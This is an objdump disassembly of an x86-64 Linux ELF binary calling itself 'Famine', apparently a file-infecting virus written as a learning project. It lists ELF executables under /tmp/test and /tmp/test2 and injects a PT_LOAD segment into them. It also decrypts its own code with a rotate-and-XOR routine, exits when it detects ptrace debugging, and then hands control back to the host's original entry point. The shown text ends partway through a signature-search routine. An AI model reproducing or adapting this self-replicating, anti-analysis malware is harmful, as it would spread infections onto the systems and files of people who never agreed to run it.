
Famine:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <procdir>:
  401000:	2f                   	(bad)
  401001:	70 72                	jo     401075 <the_end+0x13>
  401003:	6f                   	outsl  %ds:(%rsi),(%dx)
  401004:	63 2f                	movsxd (%rdi),%ebp
	...

0000000000401007 <proc_status>:
  401007:	2f                   	(bad)
  401008:	73 74                	jae    40107e <the_end+0x1c>
  40100a:	61                   	(bad)
  40100b:	74 75                	je     401082 <the_end+0x20>
  40100d:	73 00                	jae    40100f <proc_test>

000000000040100f <proc_test>:
  40100f:	4e 61                	rex.WRX (bad)
  401011:	6d                   	insl   (%dx),%es:(%rdi)
  401012:	65 3a 09             	cmp    %gs:(%rcx),%cl
  401015:	74 65                	je     40107c <the_end+0x1a>
  401017:	73 74                	jae    40108d <the_end+0x2b>
  401019:	0a                   	.byte 0xa

000000000040101a <firstDir>:
  40101a:	2f                   	(bad)
  40101b:	74 6d                	je     40108a <the_end+0x28>
  40101d:	70 2f                	jo     40104e <signature+0x1f>
  40101f:	74 65                	je     401086 <the_end+0x24>
  401021:	73 74                	jae    401097 <print_string+0x2>
	...

0000000000401024 <secondDir>:
  401024:	2f                   	(bad)
  401025:	74 6d                	je     401094 <the_end+0x32>
  401027:	70 2f                	jo     401058 <signature+0x29>
  401029:	74 65                	je     401090 <the_end+0x2e>
  40102b:	73 74                	jae    4010a1 <print_string+0xc>
  40102d:	32 00                	xor    (%rax),%al

000000000040102f <signature>:
  40102f:	46 61                	rex.RX (bad)
  401031:	6d                   	insl   (%dx),%es:(%rdi)
  401032:	69 6e 65 20 76 65 72 	imul   $0x72657620,0x65(%rsi),%ebp
  401039:	73 69                	jae    4010a4 <print_string+0xf>
  40103b:	6f                   	outsl  %ds:(%rsi),(%dx)
  40103c:	6e                   	outsb  %ds:(%rsi),(%dx)
  40103d:	20 31                	and    %dh,(%rcx)
  40103f:	2e 30 20             	cs xor %ah,(%rax)
  401042:	28 63 29             	sub    %ah,0x29(%rbx)
  401045:	6f                   	outsl  %ds:(%rsi),(%dx)
  401046:	64 65 64 20 62 79    	fs gs and %ah,%fs:0x79(%rdx)
  40104c:	20 3c 6f             	and    %bh,(%rdi,%rbp,2)
  40104f:	63 72 6f             	movsxd 0x6f(%rdx),%esi
  401052:	73 73                	jae    4010c7 <str_copy.loop>
  401054:	69 3e 2d 3c 65 6c    	imul   $0x6c653c2d,(%rsi),%edi
  40105a:	61                   	(bad)
  40105b:	69 67 6e 65 6c 3e 00 	imul   $0x3e6c65,0x6e(%rdi),%esp

0000000000401062 <the_end>:
  401062:	54                   	push   %rsp
  401063:	68 69 73 20 69       	push   $0x69207369
  401068:	73 20                	jae    40108a <the_end+0x28>
  40106a:	74 68                	je     4010d4 <search_substring+0x5>
  40106c:	65 20 65 6e          	and    %ah,%gs:0x6e(%rbp)
  401070:	64 20 6d 79          	and    %ch,%fs:0x79(%rbp)
  401074:	20 66 72             	and    %ah,0x72(%rsi)
  401077:	69 65 6e 64 2c 20 6d 	imul   $0x6d202c64,0x6e(%rbp),%esp
  40107e:	79 20                	jns    4010a0 <print_string+0xb>
  401080:	6f                   	outsl  %ds:(%rsi),(%dx)
  401081:	6e                   	outsb  %ds:(%rsi),(%dx)
  401082:	6c                   	insb   (%dx),%es:(%rdi)
  401083:	79 20                	jns    4010a5 <print_string+0x10>
  401085:	66 72 69             	data16 jb 4010f1 <search_substring.search_loop+0x1>
  401088:	65 6e                	outsb  %gs:(%rsi),(%dx)
  40108a:	64 20 74 68 65       	and    %dh,%fs:0x65(%rax,%rbp,2)
  40108f:	20 65 6e             	and    %ah,0x6e(%rbp)
  401092:	64 0a 00             	or     %fs:(%rax),%al

0000000000401095 <print_string>:
  401095:	57                   	push   %rdi
  401096:	56                   	push   %rsi
  401097:	52                   	push   %rdx
  401098:	48 89 fe             	mov    %rdi,%rsi
  40109b:	e8 13 00 00 00       	call   4010b3 <str_len>
  4010a0:	48 89 c2             	mov    %rax,%rdx
  4010a3:	bf 01 00 00 00       	mov    $0x1,%edi
  4010a8:	b8 01 00 00 00       	mov    $0x1,%eax
  4010ad:	0f 05                	syscall
  4010af:	5a                   	pop    %rdx
  4010b0:	5e                   	pop    %rsi
  4010b1:	5f                   	pop    %rdi
  4010b2:	c3                   	ret

00000000004010b3 <str_len>:
  4010b3:	57                   	push   %rdi
  4010b4:	48 31 c0             	xor    %rax,%rax

00000000004010b7 <str_len.loop>:
  4010b7:	80 3f 00             	cmpb   $0x0,(%rdi)
  4010ba:	74 08                	je     4010c4 <str_len.done>
  4010bc:	48 ff c7             	inc    %rdi
  4010bf:	48 ff c0             	inc    %rax
  4010c2:	eb f3                	jmp    4010b7 <str_len.loop>

00000000004010c4 <str_len.done>:
  4010c4:	5f                   	pop    %rdi
  4010c5:	c3                   	ret

00000000004010c6 <str_copy>:
  4010c6:	57                   	push   %rdi

00000000004010c7 <str_copy.loop>:
  4010c7:	ac                   	lods   %ds:(%rsi),%al
  4010c8:	aa                   	stos   %al,%es:(%rdi)
  4010c9:	84 c0                	test   %al,%al
  4010cb:	75 fa                	jne    4010c7 <str_copy.loop>
  4010cd:	58                   	pop    %rax
  4010ce:	c3                   	ret

00000000004010cf <search_substring>:
  4010cf:	55                   	push   %rbp
  4010d0:	48 89 e5             	mov    %rsp,%rbp
  4010d3:	41 54                	push   %r12
  4010d5:	41 55                	push   %r13
  4010d7:	41 56                	push   %r14
  4010d9:	41 57                	push   %r15
  4010db:	53                   	push   %rbx
  4010dc:	49 89 fc             	mov    %rdi,%r12
  4010df:	49 89 f5             	mov    %rsi,%r13
  4010e2:	49 89 d6             	mov    %rdx,%r14
  4010e5:	49 89 cf             	mov    %rcx,%r15
  4010e8:	4d 39 ef             	cmp    %r13,%r15
  4010eb:	77 3e                	ja     40112b <search_substring.search_not_found>
  4010ed:	48 31 db             	xor    %rbx,%rbx

00000000004010f0 <search_substring.search_loop>:
  4010f0:	4c 89 e8             	mov    %r13,%rax
  4010f3:	48 29 d8             	sub    %rbx,%rax
  4010f6:	4c 39 f8             	cmp    %r15,%rax
  4010f9:	72 30                	jb     40112b <search_substring.search_not_found>
  4010fb:	49 8d 3c 1c          	lea    (%r12,%rbx,1),%rdi
  4010ff:	4c 89 f6             	mov    %r14,%rsi
  401102:	4c 89 f9             	mov    %r15,%rcx
  401105:	48 31 c0             	xor    %rax,%rax

0000000000401108 <search_substring.compare_loop>:
  401108:	4c 39 f8             	cmp    %r15,%rax
  40110b:	7d 17                	jge    401124 <search_substring.search_found>
  40110d:	44 8a 04 07          	mov    (%rdi,%rax,1),%r8b
  401111:	44 8a 0c 06          	mov    (%rsi,%rax,1),%r9b
  401115:	45 38 c8             	cmp    %r9b,%r8b
  401118:	75 05                	jne    40111f <search_substring.search_next>
  40111a:	48 ff c0             	inc    %rax
  40111d:	eb e9                	jmp    401108 <search_substring.compare_loop>

000000000040111f <search_substring.search_next>:
  40111f:	48 ff c3             	inc    %rbx
  401122:	eb cc                	jmp    4010f0 <search_substring.search_loop>

0000000000401124 <search_substring.search_found>:
  401124:	b8 01 00 00 00       	mov    $0x1,%eax
  401129:	eb 03                	jmp    40112e <search_substring.search_done>

000000000040112b <search_substring.search_not_found>:
  40112b:	48 31 c0             	xor    %rax,%rax

000000000040112e <search_substring.search_done>:
  40112e:	5b                   	pop    %rbx
  40112f:	41 5f                	pop    %r15
  401131:	41 5e                	pop    %r14
  401133:	41 5d                	pop    %r13
  401135:	41 5c                	pop    %r12
  401137:	48 89 ec             	mov    %rbp,%rsp
  40113a:	5d                   	pop    %rbp
  40113b:	c3                   	ret

000000000040113c <check_elf64_exec>:
  40113c:	55                   	push   %rbp
  40113d:	48 89 e5             	mov    %rsp,%rbp
  401140:	41 54                	push   %r12
  401142:	41 55                	push   %r13
  401144:	41 56                	push   %r14
  401146:	41 57                	push   %r15
  401148:	53                   	push   %rbx
  401149:	49 89 fc             	mov    %rdi,%r12
  40114c:	49 89 f5             	mov    %rsi,%r13
  40114f:	4d 31 f6             	xor    %r14,%r14

0000000000401152 <check_elf64_exec.check_loop>:
  401152:	4d 39 ee             	cmp    %r13,%r14
  401155:	0f 8d bf 00 00 00    	jge    40121a <check_elf64_exec.check_done>
  40115b:	4c 89 f0             	mov    %r14,%rax
  40115e:	48 69 c0 00 10 00 00 	imul   $0x1000,%rax,%rax
  401165:	4d 8d 3c 04          	lea    (%r12,%rax,1),%r15
  401169:	b8 01 01 00 00       	mov    $0x101,%eax
  40116e:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401173:	4c 89 fe             	mov    %r15,%rsi
  401176:	31 d2                	xor    %edx,%edx
  401178:	45 31 d2             	xor    %r10d,%r10d
  40117b:	0f 05                	syscall
  40117d:	48 85 c0             	test   %rax,%rax
  401180:	0f 88 84 00 00 00    	js     40120a <check_elf64_exec.invalid_file>
  401186:	48 89 c3             	mov    %rax,%rbx
  401189:	b8 00 00 00 00       	mov    $0x0,%eax
  40118e:	89 df                	mov    %ebx,%edi
  401190:	48 8d 35 f9 2e 10 00 	lea    0x102ef9(%rip),%rsi        # 504090 <elf_header_buf>
  401197:	ba 40 00 00 00       	mov    $0x40,%edx
  40119c:	0f 05                	syscall
  40119e:	48 83 f8 40          	cmp    $0x40,%rax
  4011a2:	7c 5d                	jl     401201 <check_elf64_exec.close_and_invalid>
  4011a4:	48 8d 3d e5 2e 10 00 	lea    0x102ee5(%rip),%rdi        # 504090 <elf_header_buf>
  4011ab:	80 3f 7f             	cmpb   $0x7f,(%rdi)
  4011ae:	75 51                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011b0:	80 7f 01 45          	cmpb   $0x45,0x1(%rdi)
  4011b4:	75 4b                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011b6:	80 7f 02 4c          	cmpb   $0x4c,0x2(%rdi)
  4011ba:	75 45                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011bc:	80 7f 03 46          	cmpb   $0x46,0x3(%rdi)
  4011c0:	75 3f                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011c2:	80 7f 04 02          	cmpb   $0x2,0x4(%rdi)
  4011c6:	75 39                	jne    401201 <check_elf64_exec.close_and_invalid>
  4011c8:	0f b7 47 10          	movzwl 0x10(%rdi),%eax
  4011cc:	66 83 f8 02          	cmp    $0x2,%ax
  4011d0:	74 08                	je     4011da <check_elf64_exec.valid_elf>
  4011d2:	66 83 f8 03          	cmp    $0x3,%ax
  4011d6:	74 02                	je     4011da <check_elf64_exec.valid_elf>
  4011d8:	eb 27                	jmp    401201 <check_elf64_exec.close_and_invalid>

00000000004011da <check_elf64_exec.valid_elf>:
  4011da:	b8 03 00 00 00       	mov    $0x3,%eax
  4011df:	89 df                	mov    %ebx,%edi
  4011e1:	0f 05                	syscall
  4011e3:	4c 89 ff             	mov    %r15,%rdi
  4011e6:	e8 aa fe ff ff       	call   401095 <print_string>
  4011eb:	48 8d 3d 0f 1e 00 00 	lea    0x1e0f(%rip),%rdi        # 403001 <msg_valid>
  4011f2:	e8 9e fe ff ff       	call   401095 <print_string>
  4011f7:	4c 89 ff             	mov    %r15,%rdi
  4011fa:	e8 5b 09 00 00       	call   401b5a <add_pt_load>
  4011ff:	eb 11                	jmp    401212 <check_elf64_exec.next_file>

0000000000401201 <check_elf64_exec.close_and_invalid>:
  401201:	b8 03 00 00 00       	mov    $0x3,%eax
  401206:	89 df                	mov    %ebx,%edi
  401208:	0f 05                	syscall

000000000040120a <check_elf64_exec.invalid_file>:
  40120a:	4c 89 ff             	mov    %r15,%rdi
  40120d:	e8 9c 0c 00 00       	call   401eae <process_non_elf_file>

0000000000401212 <check_elf64_exec.next_file>:
  401212:	49 ff c6             	inc    %r14
  401215:	e9 38 ff ff ff       	jmp    401152 <check_elf64_exec.check_loop>

000000000040121a <check_elf64_exec.check_done>:
  40121a:	5b                   	pop    %rbx
  40121b:	41 5f                	pop    %r15
  40121d:	41 5e                	pop    %r14
  40121f:	41 5d                	pop    %r13
  401221:	41 5c                	pop    %r12
  401223:	48 89 ec             	mov    %rbp,%rsp
  401226:	5d                   	pop    %rbp
  401227:	c3                   	ret

0000000000401228 <list_files_recursive>:
  401228:	55                   	push   %rbp
  401229:	48 89 e5             	mov    %rsp,%rbp
  40122c:	48 81 ec 80 10 00 00 	sub    $0x1080,%rsp
  401233:	48 83 e4 f0          	and    $0xfffffffffffffff0,%rsp
  401237:	4c 89 65 d8          	mov    %r12,-0x28(%rbp)
  40123b:	4c 89 6d d0          	mov    %r13,-0x30(%rbp)
  40123f:	4c 89 75 c8          	mov    %r14,-0x38(%rbp)
  401243:	4c 89 7d c0          	mov    %r15,-0x40(%rbp)
  401247:	48 89 5d b8          	mov    %rbx,-0x48(%rbp)
  40124b:	49 89 fc             	mov    %rdi,%r12
  40124e:	4c 89 e7             	mov    %r12,%rdi
  401251:	e8 5d fe ff ff       	call   4010b3 <str_len>
  401256:	48 89 45 f0          	mov    %rax,-0x10(%rbp)
  40125a:	b8 01 01 00 00       	mov    $0x101,%eax
  40125f:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401264:	4c 89 e6             	mov    %r12,%rsi
  401267:	ba 00 00 01 00       	mov    $0x10000,%edx
  40126c:	45 31 d2             	xor    %r10d,%r10d
  40126f:	0f 05                	syscall
  401271:	48 85 c0             	test   %rax,%rax
  401274:	0f 88 33 01 00 00    	js     4013ad <list_files_recursive.done>
  40127a:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  40127e:	49 89 c5             	mov    %rax,%r13

0000000000401281 <list_files_recursive.read_loop>:
  401281:	b8 d9 00 00 00       	mov    $0xd9,%eax
  401286:	44 89 ef             	mov    %r13d,%edi
  401289:	48 8d b5 80 ef ff ff 	lea    -0x1080(%rbp),%rsi
  401290:	ba 00 10 00 00       	mov    $0x1000,%edx
  401295:	0f 05                	syscall
  401297:	48 85 c0             	test   %rax,%rax
  40129a:	0f 8e 03 01 00 00    	jle    4013a3 <list_files_recursive.close_dir>
  4012a0:	48 89 45 e8          	mov    %rax,-0x18(%rbp)
  4012a4:	48 c7 45 e0 00 00 00 	movq   $0x0,-0x20(%rbp)
  4012ab:	00 
  4012ac:	49 89 c6             	mov    %rax,%r14

00000000004012af <list_files_recursive.process_entry>:
  4012af:	48 8b 45 e0          	mov    -0x20(%rbp),%rax
  4012b3:	4c 39 f0             	cmp    %r14,%rax
  4012b6:	7d c9                	jge    401281 <list_files_recursive.read_loop>
  4012b8:	4c 8d bd 80 ef ff ff 	lea    -0x1080(%rbp),%r15
  4012bf:	49 01 c7             	add    %rax,%r15
  4012c2:	41 0f b7 5f 10       	movzwl 0x10(%r15),%ebx
  4012c7:	41 0f b6 47 12       	movzbl 0x12(%r15),%eax
  4012cc:	49 8d 4f 13          	lea    0x13(%r15),%rcx
  4012d0:	80 39 2e             	cmpb   $0x2e,(%rcx)
  4012d3:	75 1a                	jne    4012ef <list_files_recursive.not_dot>
  4012d5:	80 79 01 00          	cmpb   $0x0,0x1(%rcx)
  4012d9:	0f 84 b4 00 00 00    	je     401393 <list_files_recursive.next_entry>
  4012df:	80 79 01 2e          	cmpb   $0x2e,0x1(%rcx)
  4012e3:	75 0a                	jne    4012ef <list_files_recursive.not_dot>
  4012e5:	80 79 02 00          	cmpb   $0x0,0x2(%rcx)
  4012e9:	0f 84 a4 00 00 00    	je     401393 <list_files_recursive.next_entry>

00000000004012ef <list_files_recursive.not_dot>:
  4012ef:	48 89 45 b0          	mov    %rax,-0x50(%rbp)
  4012f3:	48 89 5d a8          	mov    %rbx,-0x58(%rbp)
  4012f7:	4c 89 e7             	mov    %r12,%rdi
  4012fa:	48 8b 45 f0          	mov    -0x10(%rbp),%rax
  4012fe:	48 01 c7             	add    %rax,%rdi
  401301:	80 7f ff 2f          	cmpb   $0x2f,-0x1(%rdi)
  401305:	74 06                	je     40130d <list_files_recursive.no_slash>
  401307:	c6 07 2f             	movb   $0x2f,(%rdi)
  40130a:	48 ff c7             	inc    %rdi

000000000040130d <list_files_recursive.no_slash>:
  40130d:	48 89 ce             	mov    %rcx,%rsi
  401310:	e8 b1 fd ff ff       	call   4010c6 <str_copy>
  401315:	48 8b 45 b0          	mov    -0x50(%rbp),%rax
  401319:	3c 08                	cmp    $0x8,%al
  40131b:	75 5d                	jne    40137a <list_files_recursive.check_dir>
  40131d:	48 8b 05 64 2d 10 00 	mov    0x102d64(%rip),%rax        # 504088 <file_count>
  401324:	48 3d 00 01 00 00    	cmp    $0x100,%rax
  40132a:	7d 2a                	jge    401356 <list_files_recursive.skip_store>
  40132c:	48 69 c0 00 10 00 00 	imul   $0x1000,%rax,%rax
  401333:	48 8d 3d 4e 2d 00 00 	lea    0x2d4e(%rip),%rdi        # 404088 <file_list>
  40133a:	48 01 c7             	add    %rax,%rdi
  40133d:	4c 89 e6             	mov    %r12,%rsi
  401340:	e8 81 fd ff ff       	call   4010c6 <str_copy>
  401345:	48 8b 05 3c 2d 10 00 	mov    0x102d3c(%rip),%rax        # 504088 <file_count>
  40134c:	48 ff c0             	inc    %rax
  40134f:	48 89 05 32 2d 10 00 	mov    %rax,0x102d32(%rip)        # 504088 <file_count>

0000000000401356 <list_files_recursive.skip_store>:
  401356:	4c 89 e7             	mov    %r12,%rdi
  401359:	e8 37 fd ff ff       	call   401095 <print_string>
  40135e:	50                   	push   %rax
  40135f:	b8 01 00 00 00       	mov    $0x1,%eax
  401364:	bf 01 00 00 00       	mov    $0x1,%edi
  401369:	48 8d 35 90 1c 00 00 	lea    0x1c90(%rip),%rsi        # 403000 <newline>
  401370:	ba 01 00 00 00       	mov    $0x1,%edx
  401375:	0f 05                	syscall
  401377:	58                   	pop    %rax
  401378:	eb 0c                	jmp    401386 <list_files_recursive.restore_path>

000000000040137a <list_files_recursive.check_dir>:
  40137a:	3c 04                	cmp    $0x4,%al
  40137c:	75 08                	jne    401386 <list_files_recursive.restore_path>
  40137e:	4c 89 e7             	mov    %r12,%rdi
  401381:	e8 a2 fe ff ff       	call   401228 <list_files_recursive>

0000000000401386 <list_files_recursive.restore_path>:
  401386:	48 8b 45 f0          	mov    -0x10(%rbp),%rax
  40138a:	41 c6 04 04 00       	movb   $0x0,(%r12,%rax,1)
  40138f:	48 8b 5d a8          	mov    -0x58(%rbp),%rbx

0000000000401393 <list_files_recursive.next_entry>:
  401393:	48 8b 45 e0          	mov    -0x20(%rbp),%rax
  401397:	48 01 d8             	add    %rbx,%rax
  40139a:	48 89 45 e0          	mov    %rax,-0x20(%rbp)
  40139e:	e9 0c ff ff ff       	jmp    4012af <list_files_recursive.process_entry>

00000000004013a3 <list_files_recursive.close_dir>:
  4013a3:	b8 03 00 00 00       	mov    $0x3,%eax
  4013a8:	44 89 ef             	mov    %r13d,%edi
  4013ab:	0f 05                	syscall

00000000004013ad <list_files_recursive.done>:
  4013ad:	4c 8b 65 d8          	mov    -0x28(%rbp),%r12
  4013b1:	4c 8b 6d d0          	mov    -0x30(%rbp),%r13
  4013b5:	4c 8b 75 c8          	mov    -0x38(%rbp),%r14
  4013b9:	4c 8b 7d c0          	mov    -0x40(%rbp),%r15
  4013bd:	48 8b 5d b8          	mov    -0x48(%rbp),%rbx
  4013c1:	48 89 ec             	mov    %rbp,%rsp
  4013c4:	5d                   	pop    %rbp
  4013c5:	c3                   	ret

00000000004013c6 <original_entry_storage>:
	...

00000000004013ce <encryption_key>:
  4013ce:	30 30                	xor    %dh,(%rax)
  4013d0:	30 30                	xor    %dh,(%rax)
  4013d2:	30 30                	xor    %dh,(%rax)
  4013d4:	30 30                	xor    %dh,(%rax)
  4013d6:	30 30                	xor    %dh,(%rax)
  4013d8:	30 30                	xor    %dh,(%rax)
  4013da:	30 30                	xor    %dh,(%rax)
  4013dc:	30 30                	xor    %dh,(%rax)

00000000004013de <encrypted_flag>:
	...

00000000004013df <_start>:
  4013df:	55                   	push   %rbp
  4013e0:	48 89 e5             	mov    %rsp,%rbp
  4013e3:	53                   	push   %rbx
  4013e4:	41 54                	push   %r12
  4013e6:	41 55                	push   %r13
  4013e8:	41 56                	push   %r14
  4013ea:	41 57                	push   %r15
  4013ec:	e8 00 00 00 00       	call   4013f1 <_start.get_decrypt_base>

00000000004013f1 <_start.get_decrypt_base>:
  4013f1:	41 5f                	pop    %r15
  4013f3:	49 83 ef 2b          	sub    $0x2b,%r15
  4013f7:	41 0f b6 47 18       	movzbl 0x18(%r15),%eax
  4013fc:	84 c0                	test   %al,%al
  4013fe:	74 1f                	je     40141f <_start.not_encrypted>
  401400:	49 8d bf 5d 01 00 00 	lea    0x15d(%r15),%rdi
  401407:	be 37 06 00 00       	mov    $0x637,%esi
  40140c:	49 8d 57 08          	lea    0x8(%r15),%rdx
  401410:	b9 10 00 00 00       	mov    $0x10,%ecx
  401415:	e8 ae 00 00 00       	call   4014c8 <decrypt_code>
  40141a:	41 c6 47 18 00       	movb   $0x0,0x18(%r15)

000000000040141f <_start.not_encrypted>:
  40141f:	e8 00 00 00 00       	call   401424 <_start.get_base_after_decrypt>

0000000000401424 <_start.get_base_after_decrypt>:
  401424:	41 5f                	pop    %r15
  401426:	49 83 ef 5e          	sub    $0x5e,%r15
  40142a:	b8 65 00 00 00       	mov    $0x65,%eax
  40142f:	bf 00 00 00 00       	mov    $0x0,%edi
  401434:	31 f6                	xor    %esi,%esi
  401436:	31 d2                	xor    %edx,%edx
  401438:	45 31 d2             	xor    %r10d,%r10d
  40143b:	0f 05                	syscall
  40143d:	48 83 f8 ff          	cmp    $0xffffffffffffffff,%rax
  401441:	74 64                	je     4014a7 <_start.being_debugged>
  401443:	e8 00 00 00 00       	call   401448 <_start.get_base>

0000000000401448 <_start.get_base>:
  401448:	41 5f                	pop    %r15
  40144a:	49 81 ef 82 00 00 00 	sub    $0x82,%r15
  401451:	49 8b 07             	mov    (%r15),%rax
  401454:	48 85 c0             	test   %rax,%rax
  401457:	0f 85 c6 00 00 00    	jne    401523 <_start.run_as_virus>
  40145d:	48 c7 05 20 2c 10 00 	movq   $0x0,0x102c20(%rip)        # 504088 <file_count>
  401464:	00 00 00 00 
  401468:	48 be 1a 10 40 00 00 	movabs $0x40101a,%rsi
  40146f:	00 00 00 
  401472:	48 8d 3d 0f 1c 00 00 	lea    0x1c0f(%rip),%rdi        # 403088 <__bss_start>
  401479:	e8 17 fc ff ff       	call   401095 <print_string>
  40147e:	e8 43 fc ff ff       	call   4010c6 <str_copy>
  401483:	48 8d 3d fe 1b 00 00 	lea    0x1bfe(%rip),%rdi        # 403088 <__bss_start>
  40148a:	e8 99 fd ff ff       	call   401228 <list_files_recursive>
  40148f:	48 8d 3d f2 2b 00 00 	lea    0x2bf2(%rip),%rdi        # 404088 <file_list>
  401496:	48 8b 35 eb 2b 10 00 	mov    0x102beb(%rip),%rsi        # 504088 <file_count>
  40149d:	e8 9a fc ff ff       	call   40113c <check_elf64_exec>
  4014a2:	e9 80 0b 00 00       	jmp    402027 <_end>

00000000004014a7 <_start.being_debugged>:
  4014a7:	b8 01 00 00 00       	mov    $0x1,%eax
  4014ac:	bf 01 00 00 00       	mov    $0x1,%edi
  4014b1:	48 8d 35 b2 1b 00 00 	lea    0x1bb2(%rip),%rsi        # 40306a <msg_debugging>
  4014b8:	ba 0c 00 00 00       	mov    $0xc,%edx
  4014bd:	0f 05                	syscall
  4014bf:	b8 3c 00 00 00       	mov    $0x3c,%eax
  4014c4:	31 ff                	xor    %edi,%edi
  4014c6:	0f 05                	syscall

00000000004014c8 <decrypt_code>:
  4014c8:	55                   	push   %rbp
  4014c9:	48 89 e5             	mov    %rsp,%rbp
  4014cc:	53                   	push   %rbx
  4014cd:	41 50                	push   %r8
  4014cf:	41 51                	push   %r9
  4014d1:	41 54                	push   %r12
  4014d3:	41 55                	push   %r13
  4014d5:	41 56                	push   %r14
  4014d7:	41 57                	push   %r15
  4014d9:	49 89 fc             	mov    %rdi,%r12
  4014dc:	49 89 f5             	mov    %rsi,%r13
  4014df:	49 89 d6             	mov    %rdx,%r14
  4014e2:	49 89 cf             	mov    %rcx,%r15
  4014e5:	48 31 db             	xor    %rbx,%rbx
  4014e8:	4d 31 c0             	xor    %r8,%r8

00000000004014eb <decrypt_code.decrypt_loop>:
  4014eb:	4c 39 eb             	cmp    %r13,%rbx
  4014ee:	7d 24                	jge    401514 <decrypt_code.decrypt_done>
  4014f0:	41 0f b6 04 1c       	movzbl (%r12,%rbx,1),%eax
  4014f5:	c0 c8 03             	ror    $0x3,%al
  4014f8:	47 0f b6 0c 06       	movzbl (%r14,%r8,1),%r9d
  4014fd:	44 30 c8             	xor    %r9b,%al
  401500:	41 88 04 1c          	mov    %al,(%r12,%rbx,1)
  401504:	48 ff c3             	inc    %rbx
  401507:	49 ff c0             	inc    %r8
  40150a:	4d 39 f8             	cmp    %r15,%r8
  40150d:	7c dc                	jl     4014eb <decrypt_code.decrypt_loop>
  40150f:	4d 31 c0             	xor    %r8,%r8
  401512:	eb d7                	jmp    4014eb <decrypt_code.decrypt_loop>

0000000000401514 <decrypt_code.decrypt_done>:
  401514:	41 5f                	pop    %r15
  401516:	41 5e                	pop    %r14
  401518:	41 5d                	pop    %r13
  40151a:	41 5c                	pop    %r12
  40151c:	41 59                	pop    %r9
  40151e:	41 58                	pop    %r8
  401520:	5b                   	pop    %rbx
  401521:	5d                   	pop    %rbp
  401522:	c3                   	ret

0000000000401523 <_start.run_as_virus>:
  401523:	e8 00 00 00 00       	call   401528 <_start.run_as_virus.get_start_rip>

0000000000401528 <_start.run_as_virus.get_start_rip>:
  401528:	58                   	pop    %rax
  401529:	48 2d 49 01 00 00    	sub    $0x149,%rax
  40152f:	49 03 07             	add    (%r15),%rax
  401532:	50                   	push   %rax
  401533:	48 81 ec 00 40 00 00 	sub    $0x4000,%rsp
  40153a:	48 83 e4 f0          	and    $0xfffffffffffffff0,%rsp
  40153e:	48 c7 04 24 00 00 00 	movq   $0x0,(%rsp)
  401545:	00 
  401546:	48 8d 7c 24 08       	lea    0x8(%rsp),%rdi
  40154b:	49 8d b7 c9 01 00 00 	lea    0x1c9(%r15),%rsi
  401552:	e8 75 00 00 00       	call   4015cc <virus_str_copy>
  401557:	48 8d 7c 24 08       	lea    0x8(%rsp),%rdi
  40155c:	48 8d 34 24          	lea    (%rsp),%rsi
  401560:	48 8d 94 24 08 10 00 	lea    0x1008(%rsp),%rdx
  401567:	00 
  401568:	e8 e1 00 00 00       	call   40164e <virus_list_and_infect>
  40156d:	48 89 ec             	mov    %rbp,%rsp
  401570:	48 8b 45 d0          	mov    -0x30(%rbp),%rax
  401574:	5d                   	pop    %rbp
  401575:	48 31 ff             	xor    %rdi,%rdi
  401578:	48 31 f6             	xor    %rsi,%rsi
  40157b:	48 31 d2             	xor    %rdx,%rdx
  40157e:	48 31 c9             	xor    %rcx,%rcx
  401581:	4d 31 c0             	xor    %r8,%r8
  401584:	4d 31 c9             	xor    %r9,%r9
  401587:	4d 31 d2             	xor    %r10,%r10
  40158a:	4d 31 db             	xor    %r11,%r11
  40158d:	ff e0                	jmp    *%rax

000000000040158f <v_firstDir>:
  40158f:	2f                   	(bad)
  401590:	74 6d                	je     4015ff <virus_search_signature+0x17>
  401592:	70 2f                	jo     4015c3 <v_signature+0x2a>
  401594:	74 65                	je     4015fb <virus_search_signature+0x13>
  401596:	73 74                	jae    40160c <virus_search_signature.vss_loop+0x8>
	...

0000000000401599 <v_signature>:
  401599:	46 61                	rex.RX (bad)
  40159b:	6d                   	insl   (%dx),%es:(%rdi)
  40159c:	69 6e 65 20 76 65 72 	imul   $0x72657620,0x65(%rsi),%ebp
  4015a3:	73 69                	jae    40160e <virus_search_signature.vss_loop+0xa>
  4015a5:	6f                   	outsl  %ds:(%rsi),(%dx)
  4015a6:	6e                   	outsb  %ds:(%rsi),(%dx)
  4015a7:	20 31                	and    %dh,(%rcx)
  4015a9:	2e 30 20             	cs xor %ah,(%rax)
  4015ac:	28 63 29             	sub    %ah,0x29(%rbx)
  4015af:	6f                   	outsl  %ds:(%rsi),(%dx)
  4015b0:	64 65 64 20 62 79    	fs gs and %ah,%fs:0x79(%rdx)
  4015b6:	20 3c 6f             	and    %bh,(%rdi,%rbp,2)
  4015b9:	63 72 6f             	movsxd 0x6f(%rdx),%esi
  4015bc:	73 73                	jae    401631 <virus_search_signature.vss_next>
  4015be:	69 3e 2d 3c 65 6c    	imul   $0x6c653c2d,(%rsi),%edi
  4015c4:	61                   	(bad)
  4015c5:	69 67 6e 65 6c 3e 00 	imul   $0x3e6c65,0x6e(%rdi),%esp

00000000004015cc <virus_str_copy>:
  4015cc:	50                   	push   %rax

00000000004015cd <virus_str_copy.v_str_copy_loop>:
  4015cd:	ac                   	lods   %ds:(%rsi),%al
  4015ce:	aa                   	stos   %al,%es:(%rdi)
  4015cf:	84 c0                	test   %al,%al
  4015d1:	75 fa                	jne    4015cd <virus_str_copy.v_str_copy_loop>
  4015d3:	58                   	pop    %rax
  4015d4:	c3                   	ret

00000000004015d5 <virus_str_len>:
  4015d5:	57                   	push   %rdi
  4015d6:	48 31 c0             	xor    %rax,%rax

00000000004015d9 <virus_str_len.v_str_len_loop>:
  4015d9:	80 3f 00             	cmpb   $0x0,(%rdi)
  4015dc:	74 08                	je     4015e6 <virus_str_len.v_str_len_done>
  4015de:	48 ff c7             	inc    %rdi
  4015e1:	48 ff c0             	inc    %rax
  4015e4:	eb f3                	jmp    4015d9 <virus_str_len.v_str_len_loop>

00000000004015e6 <virus_str_len.v_str_len_done>:
  4015e6:	5f                   	pop    %rdi
  4015e7:	c3                   	ret

00000000004015e8 <virus_search_signature>:
  4015e8:	55                   	push   %rbp
  4015e9:	48 89 e5             	mov    %rsp,%rbp
  4015ec:	41 54                	push   %r12
  4015ee:	41 55                	push   %r13
